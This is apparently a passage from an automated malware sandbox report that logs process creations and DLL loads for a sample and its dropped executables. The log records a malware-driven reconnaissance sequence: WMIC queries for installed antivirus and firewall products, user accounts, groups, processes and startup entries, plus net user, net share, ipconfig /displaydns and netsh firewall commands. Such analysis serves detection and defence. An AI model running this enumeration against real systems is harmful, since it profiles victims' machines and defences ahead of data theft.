    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csvJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csvJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csvJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydnsJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route printJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show stateJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csvJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net accounts /domainJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net shareJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net userJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 accounts /domain
    Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 share
    Source: C:\Windows\System32\net.exeProcess created: unknown unknown
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeSection loaded: msvcr100.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\jghruerSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\jghruerSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\jghruerSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\jghruerSection loaded: msvcr100.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeSection loaded: msvcr100.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\hdhruerSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\hdhruerSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\hdhruerSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\hdhruerSection loaded: msvcr100.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: winscard.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: cryptnet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\explorer.exeSection loaded: aepic.dll
    Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
    Source: C:\Windows\explorer.exeSection loaded: userenv.dll
    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
    Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\explorer.exeSection loaded: propsys.dll
    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
    Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
    Source: C:\Windows\explorer.exeSection loaded: wininet.dll
    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
    Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
    Source: C:\Windows\explorer.exeSection loaded: wldp.dll
    Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
    Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
    Source: C:\Windows\explorer.exeSection loaded: netutils.dll
    Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
    Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
    Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\explorer.exeSection loaded: aepic.dll
    Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
    Source: C:\Windows\explorer.exeSection loaded: userenv.dll
    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
    Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\explorer.exeSection loaded: propsys.dll
    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
    Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
    Source: C:\Windows\explorer.exeSection loaded: wininet.dll
    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
    Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
